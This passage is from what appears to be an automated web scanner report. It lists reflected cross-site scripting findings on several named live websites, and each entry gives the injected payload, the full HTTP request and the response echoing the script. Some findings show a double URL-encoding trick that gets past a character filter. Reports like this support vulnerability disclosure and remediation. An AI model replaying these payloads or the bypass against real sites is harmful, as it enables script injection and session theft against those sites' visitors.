4.396. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e509"><script>alert(1)</script>6e1baafeaf7 was submitted in the REST URL parameter 5. This input was echoed as 4e509\"><script>alert(1)</script>6e1baafeaf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/style.css4e509"><script>alert(1)</script>6e1baafeaf7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:35 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/style.css4e509\"><script>alert(1)</script>6e1baafeaf7"/>
...[SNIP]...

4.397. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb4ce"><script>alert(1)</script>0e6703dee9d was submitted in the REST URL parameter 1. This input was echoed as bb4ce\"><script>alert(1)</script>0e6703dee9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogbb4ce"><script>alert(1)</script>0e6703dee9d/wp-includes/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blogbb4ce\"><script>alert(1)</script>0e6703dee9d/wp-includes/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.398. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26937"><script>alert(1)</script>623efd4c563 was submitted in the REST URL parameter 2. This input was echoed as 26937\"><script>alert(1)</script>623efd4c563 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes26937"><script>alert(1)</script>623efd4c563/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:29 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes26937\"><script>alert(1)</script>623efd4c563/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.399. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37aa"><script>alert(1)</script>bfdee75891b was submitted in the REST URL parameter 3. This input was echoed as e37aa\"><script>alert(1)</script>bfdee75891b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/jse37aa"><script>alert(1)</script>bfdee75891b/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:00 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes/jse37aa\"><script>alert(1)</script>bfdee75891b/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.400. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf9dc"><script>alert(1)</script>2f7e1717085 was submitted in the REST URL parameter 4. This input was echoed as cf9dc\"><script>alert(1)</script>2f7e1717085 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquerycf9dc"><script>alert(1)</script>2f7e1717085/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:34 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes/js/jquerycf9dc\"><script>alert(1)</script>2f7e1717085/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.401. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33098"><script>alert(1)</script>334e90016a7 was submitted in the REST URL parameter 5. This input was echoed as 33098\"><script>alert(1)</script>334e90016a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquery/jquery.js33098"><script>alert(1)</script>334e90016a7?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:53:09 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:53:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes/js/jquery/jquery.js33098\"><script>alert(1)</script>334e90016a7?ver=1.4.2"/>
...[SNIP]...

4.402. http://themehybrid.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3efee"><script>alert(1)</script>a6bb477d363 was submitted in the REST URL parameter 1. This input was echoed as 3efee\"><script>alert(1)</script>a6bb477d363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3efee"><script>alert(1)</script>a6bb477d363 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:35 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10332

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/favicon.ico3efee\"><script>alert(1)</script>a6bb477d363"/>
...[SNIP]...

4.403. http://themehybrid.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9a9e"><script>alert(1)</script>3a4d3743f82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9a9e\"><script>alert(1)</script>3a4d3743f82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c9a9e"><script>alert(1)</script>3a4d3743f82=1 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:25 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:50:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10338

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/favicon.ico?c9a9e\"><script>alert(1)</script>3a4d3743f82=1"/>
...[SNIP]...

4.404. http://themehybrid.com/themes/shadow [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /themes/shadow

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724f1"><script>alert(1)</script>f58e6876aa was submitted in the REST URL parameter 2. This input was echoed as 724f1\"><script>alert(1)</script>f58e6876aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/shadow724f1"><script>alert(1)</script>f58e6876aa HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Date: Mon, 24 Jan 2011 23:08:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f6177b1b9eecf87361d317653896a6cd; path=/
Last-Modified: Mon, 24 Jan 2011 23:09:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10332

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/themes/shadow724f1\"><script>alert(1)</script>f58e6876aa"/>
...[SNIP]...

4.405. http://themehybrid.com/themes/shadow [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /themes/shadow

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43780"><script>alert(1)</script>ea07d5a6863 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43780\"><script>alert(1)</script>ea07d5a6863 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/shadow?43780"><script>alert(1)</script>ea07d5a6863=1 HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:06:23 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=a629d306e11ea7b3eb0918077b4324c2; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11504

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/themes/shadow?43780\"><script>alert(1)</script>ea07d5a6863=1"/>
...[SNIP]...

4.406. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61900%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3ec98366db was submitted in the REST URL parameter 1. This input was echoed as 61900"><script>alert(1)</script>b3ec98366db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /61900%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3ec98366db/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=eb5a53dd9393fea7e28a18ad42ff6222; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<base href="http://venedet.michnica.net/61900"><script>alert(1)</script>b3ec98366db/joomla/1-joomla-16-je-tu" />
...[SNIP]...

4.407. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65783%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25b1f376489 was submitted in the REST URL parameter 2. This input was echoed as 65783"><script>alert(1)</script>25b1f376489 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/joomla65783%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25b1f376489/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:10 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=2f61d9afac2a2e2a40887fe127d09901; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<base href="http://venedet.michnica.net/index.php/joomla65783"><script>alert(1)</script>25b1f376489/1-joomla-16-je-tu" />
...[SNIP]...

4.408. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9512%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee1fd9be6da3 was submitted in the REST URL parameter 3. This input was echoed as d9512"><img src=a onerror=alert(1)>e1fd9be6da3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/joomla/1-joomla-16-je-tud9512%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee1fd9be6da3 HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=4e6292121ddffab5507f5e58e905f7fb; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<base href="http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tud9512"><img src=a onerror=alert(1)>e1fd9be6da3" />
...[SNIP]...

4.409. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57476%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3231f45f59c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57476\"><script>alert(1)</script>3231f45f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3231f45f59c=1 HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:52 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=99325c8ec62692dc740442bdffc82c84; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<form method="post" action="http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476\"><script>alert(1)</script>3231f45f59c=1&hitcount=0">
...[SNIP]...

4.410. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66679%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a4f7ab6f7 was submitted in the REST URL parameter 1. This input was echoed as 66679"><script>alert(1)</script>9a4f7ab6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

